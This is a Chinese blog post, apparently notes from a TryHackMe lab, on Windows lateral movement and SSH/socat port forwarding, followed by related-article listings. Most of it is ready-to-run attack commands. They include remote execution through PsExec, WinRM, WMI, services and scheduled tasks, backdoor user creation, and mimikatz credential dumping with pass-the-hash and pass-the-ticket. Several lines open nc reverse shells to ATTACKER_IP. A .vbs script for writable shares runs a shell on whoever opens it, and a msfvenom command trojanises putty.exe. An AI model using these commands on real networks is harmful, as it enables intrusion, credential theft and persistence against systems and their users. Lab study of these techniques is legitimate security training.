内网windows横向移动及ssh建立端口转发

最新推荐文章于 2024-08-20 20:55:28 发布
最新推荐文章于 2024-08-20 20:55:28 发布
阅读量92 收藏 2
点赞数 3
分类专栏: 网络安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44268185/article/details/141357263
版权

内网windows横向移动

横向移动与旋转

远程生成进程

# PSexec

## 条件
端口:445/TCP(smb)
所需的组成员身份:管理员
## 下载位置
https://learn.microsoft.com/en-us/sysinternals/downloads/psexec
## 使用
psexec64.exe \\MACHINE_IP -u Administrator -p Mypass123 -i cmd.exe

# WinRM
## 条件
端口:5985/TCP (WinRM HTTP) 或 5986/TCP (WinRM HTTPS)
所需的组成员身份:远程管理用户
## 使用
winrs.exe -u:Administrator -p:Mypass123 -r:target cmd

# powershell替代WinRM
我们可以从 Powershell 实现相同的目的,但要传递不同的凭据,我们需要创建一个 PSCredential 对象:

$username = 'Administrator';
$password = 'Mypass123';
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
获得 PSCredential 对象后,可以使用 Enter-PSSession cmdlet 创建交互式会话:

Enter-PSSession -Computername TARGET -Credential $credential
Powershell 还包括 Invoke-Command cmdlet,它通过 WinRM 远程运行 ScriptBlocks。凭据也必须通过 PSCredential 对象传递:

Invoke-Command -Computername TARGET -Credential $credential -ScriptBlock {whoami}

# ps
msf快捷使用
msfconsole -q -x "use exploit/multi/handler; set payload windows/shell/reverse_tcp; set LHOST lateralmovement; set LPORT 4444;exploit"

远程生成服务

# 使用 sc 创建服务
## 条件
端口:
  135/TCP、49152-65535/TCP (DCE/RPC)
  445/TCP(基于 SMB 命名管道的 RPC)445/TCP (RPC over SMB Named Pipes)
  139/TCP(基于 SMB 命名管道的 RPC)139/TCP (RPC over SMB Named Pipes)
所需的组成员身份:管理员
## 使用
### 创建新用户
sc.exe \\TARGET create THMservice binPath= "net user munra Pass123 /add" start= auto
sc.exe \\TARGET start THMservice
### 停止和删除服务
sc.exe \\TARGET stop THMservice
sc.exe \\TARGET delete THMservice

远程创建计划任务

# schtasks
## 使用
### 创建计划任务
schtasks /s TARGET /RU "SYSTEM" /create /tn "THMtask1" /tr "<command/payload to execute>" /sc ONCE /sd 01/01/1970 /st 00:00 
schtasks /s TARGET /run /TN "THMtask1"
### 删除计划任务
schtasks /S TARGET /TN "THMtask1" /DELETE /F

使用WMI 横向移动

连接到wmi

$username = 'Administrator';
$password = 'Mypass123';
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;

#建立wmi会话
## DCOM
RPC over IP 将用于连接到 WMI。此协议使用端口 135/TCP 和端口 49152-65535/TCP,如使用 sc.exe 时所述。
## winRM
WinRM 将用于连接到 WMI。此协议使用端口 5985/TCP (WinRM HTTP) 或 5986/TCP (WinRM HTTPS)
## powershell
$Opt = New-CimSessionOption -Protocol DCOM
$Session = New-Cimsession -ComputerName TARGET -Credential $credential -SessionOption $Opt -ErrorAction Stop

使用wmi创建远程进程

# 使用wmi创建远程进程
## 需求
端口:
135/TCP、49152-65535/TCP (DCERPC)
5985/TCP (WinRM HTTP) 或 5986/TCP (WinRM HTTPS)
所需的组成员身份:管理员
## 使用
### powershell
$Command = "powershell.exe -Command Set-Content -Path C:\text.txt -Value munrawashere";

Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{
CommandLine = $Command
}
### 在旧系统中可以使用wmic
wmic.exe /user:Administrator /password:Mypass123 /node:TARGET process call create "cmd.exe /c calc.exe"

使用wmi远程创建服务

# 使用wmi远程创建服务
## 需求
端口:
135/TCP、49152-65535/TCP (DCERPC)
5985/TCP (WinRM HTTP) 或 5986/TCP (WinRM HTTPS)
所需的组成员身份:管理员
## 使用
### powershell
Invoke-CimMethod -CimSession $Session -ClassName Win32_Service -MethodName Create -Arguments @{
Name = "THMService2";
DisplayName = "THMService2";
PathName = "net user munra2 Pass123 /add"; # Your payload
ServiceType = [byte]::Parse("16"); # Win32OwnProcess : Start service in a new process
StartMode = "Manual"
}
# 启动命令
$Service = Get-CimInstance -CimSession $Session -ClassName Win32_Service -filter "Name LIKE 'THMService2'"
Invoke-CimMethod -InputObject $Service -MethodName StartService
# 停止或删除服务
Invoke-CimMethod -InputObject $Service -MethodName StopService
Invoke-CimMethod -InputObject $Service -MethodName Delete

使用 WMI 远程创建计划任务

# 需求
端口:
135/TCP、49152-65535/TCP (DCERPC)
5985/TCP (WinRM HTTP) 或 5986/TCP (WinRM HTTPS)
所需的组成员身份:管理员

# 使用
## powershell
# Payload must be split in Command and Args
$Command = "cmd.exe"
$Args = "/c net user munra22 aSdf1234 /add"

$Action = New-ScheduledTaskAction -CimSession $Session -Execute $Command -Argument $Args
Register-ScheduledTask -CimSession $Session -Action $Action -User "NT AUTHORITY\SYSTEM" -TaskName "THMtask2"
Start-ScheduledTask -CimSession $Session -TaskName "THMtask2"

通过wmi安装msi包

# 需求
端口:
135/TCP、49152-65535/TCP (DCERPC)
5985/TCP (WinRM HTTP) 或 5986/TCP (WinRM HTTPS)
所需的组成员身份:管理员

# 使用
## powershell
Invoke-CimMethod -CimSession $Session -ClassName Win32_Product -MethodName Install -Arguments @{PackageLocation = "C:\Windows\myinstaller.msi"; Options = ""; AllUsers = $false}

# 我们可以通过在遗留系统中使用 wmic 来实现相同的目的:
wmic /node:TARGET /user:DOMAIN\USER product call install PackageLocation=c:\Windows\myinstaller.msi

使用备用认证材料

提取NTLM哈希

# 从本地SAM中提取NTLM哈希
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # lsadump::sam 

# 从LSASS内存中提取NTLM哈希
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # sekurlsa::msv 

# mimikatz使用
mimikatz # token::revert
mimikatz # sekurlsa::pth /user:bob.jenkins /domain:za.tryhackme.com /ntlm:6b4a57f67805a663c818106dc0648484 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5555"

# linux传递哈希值
## 使用PtH连接到RDP
xfreerdp /v:VICTIM_IP /u:DOMAIN\\MyUser /pth:NTLM_HASH
## 使用linux版本PSexec
psexec.py -hashes NTLM_HASH DOMAIN/MyUser@VICTIM_IP
## 使用WinRM
evil-winrm -i VICTIM_IP -u MyUser -H NTLM_HASH

Kerberos认证

#提取票据
mimikatz # privilege::debug
mimikatz # sekurlsa::tickets /export
# 将票证注入当前会话
mimikatz # kerberos::ptt [0;427fcd5]-2-0-40e10000-Administrator@krbtgt-ZA.TRYHACKME.COM.kirbi
# 检查票证
klist

密钥传递

# 获取加密密钥
mimikatz # privilege::debug
mimikatz # sekurlsa::ekeys

传递密钥并获取反弹shell
# RC4
mimikatz # sekurlsa::pth /user:Administrator /domain:za.tryhackme.com /rc4:96ea24eff4dff1fbe13818fbf12ea7d8 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5556"
# AES128
mimikatz # sekurlsa::pth /user:Administrator /domain:za.tryhackme.com /aes128:b65ea8151f13a31d01377f5934bf3883 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5556"
# AES256
mimikatz # sekurlsa::pth /user:Administrator /domain:za.tryhackme.com /aes256:b54259bbff03af8d37a138c375e29254a2ca0649337cc4c73addcd696b4cdb65 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5556"

滥用用户行为

滥用可写网络共享

当存在共享文件,并且有用户拉去他并执行时,可获取反弹shell
举例
# .vbs脚本(假设有nc)
CreateObject("WScript.Shell").Run "cmd.exe /c copy /Y \\10.10.28.6\myshare\nc64.exe %tmp% & %tmp%\nc64.exe -e cmd.exe <attacker_ip> 1234", 0, True
#假设有.exe文件(msf注入)
msfvenom -a x64 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=<attacker_ip> lport=4444 -b "\x00" -f exe -o puttyX.exe

RDP劫持

如果你在 Windows Server 2016 及更早版本上具有 SYSTEM 权限,则无需密码即可接管任何现有 RDP 会话
# 以管理员身份运行cmd或者运行命令
PsExec64.exe -s cmd.exe
输入:
query user(当看到有disc即可接管,active也可以接管但会顶下合法用户)
tscon 3 /dest:rdp-tcp#6

端口转发

ssh隧道

## 创建用户

useradd tunneluser -m -d /home/tunneluser -s /bin/true
passwd tunneluser

#SSH远程端口转发
攻击机A(1.1.1.1),已沦陷B(2.2.2.2),待攻击C(3.3.3.3)

ssh tunneluser@1.1.1.1 -R 3389:3.3.3.3:3389 -N(B运行,访问A3389,如同利用B访问C3389)

#本地端口转发
攻击机A(1.1.1.1),已沦陷B(2.2.2.2),待攻击C(3.3.3.3)
ssh tunneluser@1.1.1.1 -L *:80:127.0.0.1:80 -N(B运行,将A的80端口开放至B的80端口可以让C反弹)

打开入方向防火墙
netsh advfirewall firewall add rule name="Open Port 80" dir=in action=allow protocol=TCP localport=80

socat进行端口转发

攻击机A(1.1.1.1),已沦陷B(2.2.2.2),待攻击C(3.3.3.3)
# 远程端口转发
socat TCP4-LISTEN:3389,fork TCP4:3.3.3.3:3389(B运行,访问B3389如同访问C3389)
# 本地端口转发
socat TCP4-LISTEN:80,fork TCP4:1.1.1.1:80(B运行,监听A80端口,如同监听B80端口)

动态端口转发和socks

ssh tunneluser@1.1.1.1 -R 9050 -N
编辑 /etc/proxychains.conf配置代理链
proxychains curl http://pxeboot.za.tryhackme.com #代理使用

更多关于横向移动的方法

# 穿梭机

https://github.com/sshuttle/sshuttle

# rpivot

https://github.com/klsecservices/rpivot

# chisel

https://github.com/jpillora/chisel

# 使用 Shadowmove 劫持套接字

https://adepts.of0x.cc/shadowmove-hijack-socket/
K-D小昊
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透-内网代理穿透和内网横向移动
lza20001103的博客
09-23 2246
内网代理穿透和内网横向移动 文章目录内网代理穿透和内网横向移动前言内网代理穿透nctermite(ew)ssh正向代理(A,B,C)msf设置路由和sock4代理访问内网流量内网横向移动后记 前言 进入内网后,我们就要扫描内网中有哪些主机了,重点是我们外网是无法访问内网的主机的,所在网段是不一样的,这时就需要我们设置代理和路由进行访问内网的流量了。上一期讲解了信息收集的相关内容,收集网段,补丁和域中成员以及域控的信息,对以下的横向移动至关重要,对后期的提权做好了准备。 内网代理穿透 首先,我们介绍几种代理工
内网渗透】全网最详细的端口转发教程
TT小子的博客
06-22 1825
最近在真实环境测试和编写靶场实战教程时,总会遇到内网主机无法直接访问,需要通过转发端口、建立代理隧道等方式去访问,以方便后续进一步的横向渗透测试。本文章主要介绍一些端口转发工具的使用。
Windows 横向移动的常用技术
cike_y
07-06 1855
横向移动不仅仅是需要收集明文凭据,还需要收集密文凭据,在遇到防火墙受阻和端口限制的情况下,我们可以使用建立端口转发稳定的隧道来与目标进行通信,当用户拥有某些权限时,我们也可以扩展危害性,感染其他用户来进行横向移动
内网横向移动小结
qq_61475980的博客
03-19 1807
Windows-Mimikatz 适用环境:微软为了防止明文密码泄露发布了补丁 KB2871997,关闭了 Wdigest 功能。当系统为 win10 或 2012R2 以上时,默认在内存缓存中禁止保存明文密码,此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取。1、在线读2、离线读(解决Mimikatz被拦截)Procdump是微软官方的工具,可在命令行将lsass导出且杀软不会拦截下载之后3、解决高版本读取问题。
内网横向SSH协议隧道搭建详解
网络安全从业者的学习笔记
04-26 1186
SSH隧道是通过Secure Shell(SSH)协议在两个网络节点之间创建的加密通道。它可以用于安全地传输数据,绕过网络限制或保护数据免受窃听。通过SSH隧道,可以在两个网络之间建立安全的连接,例如在本地计算机和远程服务器之间传输数据,或者在两个远程服务器之间进行数据交换。SSH隧道通过SSH协议的加密功能,确保数据在传输过程中的机密性和完整性,是绕过防火墙限制的常用手段。
内网安全横向移动&Exchange服务&有账户CVE漏洞&无账户口令爆破
今天是几号的博客
03-30 955
Exchange Server 是微软公司的一套电子邮件服务组件,是个消息与协作系统。简单而言,Exchange server可以被用来构架应用于企业、学校的邮件系统。Exchange是收费邮箱,但是国内微软并不直接出售Exchange邮箱,而是将Exchange、Lync、Sharepoint三款产品包装成Office365出售。实验靶场环境:0day.org单域环境Win7 x64 0day.org PC-Jack 访问域主机地址。
lcx端口转发linux_技术干货 | 内网渗透之代理转发
weixin_39735005的博客
12-20 655
1 前言谈到内网转发,在我们日常的渗透测试过程中经常会用到端口转发,可以利用代理脚本将内网的流量代理到本地进行访问,这样极大的方便了我们对内网进行横向渗透。那为什么不直接通过登陆服务器来对内网中其他机器进行渗透,而是通过内网转发呢?意义何在呢?因为.........大部分时候拿到权限不够,无法直接登录。而且如果在内网服务器中进行操作,我们需要上传工具进行很多操作,如果服务器缺少对应的环境...
内网安全横向移动&Kerberos攻击&SPN扫描&WinRM&WinRS&RDP
今天是几号的博客
03-29 1064
请求的Kerberos服务票证的加密类型是RC4_HMAC_MD5,这意味着服务帐户的NTLM密码哈希用于加密服务票证。如果我们有一个为域用户帐户注册的任意SPN,那么该用户帐户的明文密码的NTLM哈希值就将用于创建服务票证。黑客可以使用有效的域用户的身份验证票证(TGT)去请求运行在服务器上的一个或多个目标服务的服务票证。DC在活动目录中查找SPN,并使用与SPN关联的服务帐户加密票证,以便服务能够验证用户是否可以访问。•服务票据的暴力破解(使用密码字典进行RC4协议破解)cs 内置端口扫描3389。
windows下端口映射(端口转发
热门推荐
Thorpe Tao的专栏
04-18 4万+
本文是对网文的归纳整理,算不上原创,摸索过程亲手测试过 一.搞清楚概念 所谓的映射、转发是针对接收数据的端口而言的,一般用作服务端,要侦听的 应用场景如:原本有个服务程序在PC2上运行,侦听着PC2上的B端口,现在希望在不动PC2及服务程序的前提下,外界能通过PC1的A端口与PC2上服务程序通信,这时就需要用端口映射(端口转发)来解决。 将PC1的A端口映射到PC2的B
SSH端口转发实现内网穿透的实现
09-14
主要介绍了SSH端口转发实现内网穿透的实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
linux ssh端口转发的三种方式
01-10
这几天teamviewer被黑的事情影响挺大,于是由远程控制想到了内网穿透,自然而然的想到了ssh端口转发也能实现内网穿透。再细想一下,发现ssh隧道、或者说端口转发,竟然实现了正向代理、反向代理和内网穿透三种常用...
windows本地与云端服务器进行SSH与frp内网穿透.pdf
08-25
这一过程通常涉及到域名映射和端口转发设置,以使得外部能够通过特定的域名或IP地址访问内网服务。 总之,SSH提供了安全的远程访问,而FRP则解决了内网服务对外暴露的问题。通过它们的结合使用,即使在复杂的网络...
SSH端口转发原理PPT课件
01-31
详细介绍SSH端口转发的概念和原理,具体阐释其过程,举例说明如何通过SSH端口转发实现外网远程控制内网PC
特洛伊木马:现代网络安全的隐形威胁
weixin_48579910的博客
08-16 617
特洛伊木马是一种伪装成合法软件或文件的恶意程序。攻击者利用这种伪装,使受害者在不知情的情况下主动安装或运行木马,从而为攻击者打开了进入目标系统的大门。与病毒不同,木马并不会自我复制,而是通过社会工程学等手段诱使用户下载和执行。特洛伊木马虽然是网络世界中的“老兵”,但其隐蔽性和多样性使得它至今仍然是网络安全的一大威胁。了解木马的工作原理和危害,并采取适当的防范措施,可以帮助我们在数字化生活中更加安全地航行。
【办公软件】安全风险 Microsoft 已阻止宏运行,因为此文件的来源不受信任
最新发布
一点硬件
08-20 124
安全风险 Microsoft 已阻止宏运行 因为此文件的来源不受信任
安全密码算法:SM3哈希算法介绍
Angelic_lan的博客
08-16 884
国密算法之一,哈希算法的一种,也是密码杂凑算法。可以将不定长的输入消息message,经过SM3算法计算后输出为32B固定长度的哈希值(hash value)。哈希算法的实质是单向散列函数(one-way hash function),其特点是,输入数据有1bit的改变都有很大概率会产生不同的散列值,因而很多场景中会使用散列值来验证输入消息的完整性。
如何选择较为安全的第三方依赖版本?
极客星云-CSDN博客
08-16 121
本篇博文分享如何选择较为安全的第三方依赖版本的方法。
车辆电子围栏系统:守护爱车安全的智能新防线
2301_81759256的博客
08-20 181
在未来,随着技术的不断进步和应用的持续深化,我们有理由相信,车辆电子围栏系统将会为更多车主带来安心与便捷,共同守护每一段旅程的平安与美好。车主可以根据自己的实际需求,自由设定围栏的范围大小、形状及预警方式,无论是家庭住址、公司停车位还是孩子的学校周边,都能成为保护爱车的安全区域。一旦车辆跨越这个预设的“围栏”,系统便会立即触发警报,通过手机APP、短信或电话等多种方式通知车主,实现对车辆位置的实时监控与异常行为的即时响应。其中,车辆电子围栏系统作为一项创新的安全技术,正悄然成为车主们守护爱车安全的新宠。
windows11 ssh端口转发
08-22
Windows 11上进行SSH端口转发,可以使用ZOC软件来实现。ZOC支持SSH代理转发技术,可以在辅助SSH会话中提供身份验证的密钥。这意味着您可以通过在远程shell中键入ssh命令来实现与第三个服务器的SSH连接,并无需再次输入密码,只需使用之前的SSH密钥对进行验证。 此外,如果您需要在Windows 11上运行带有图形用户界面的程序,比如X11应用程序,您也可以使用SSH来实现。X11是一种通信协议,允许在远程计算机上运行带有图形用户界面的程序。通过SSH,在SSH客户端和服务器之间传递X11通信,您可以在远程shell上运行X11命令,并在本地计算机上显示窗口。 需要注意的是,如果您想要实现外网能够访问内网的主机,并进行SSH端口转发,您需要确保防火墙放行了SSH的22端口。此外,通过SSH协议传输的数据是被加密的,确保了数据的安全性。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [mac删除ssh key_好用的mac终端命令仿真工具](https://blog.csdn.net/weixin_39985820/article/details/109956729)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [ssh端口转发](https://blog.csdn.net/studywinwin/article/details/104367123)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值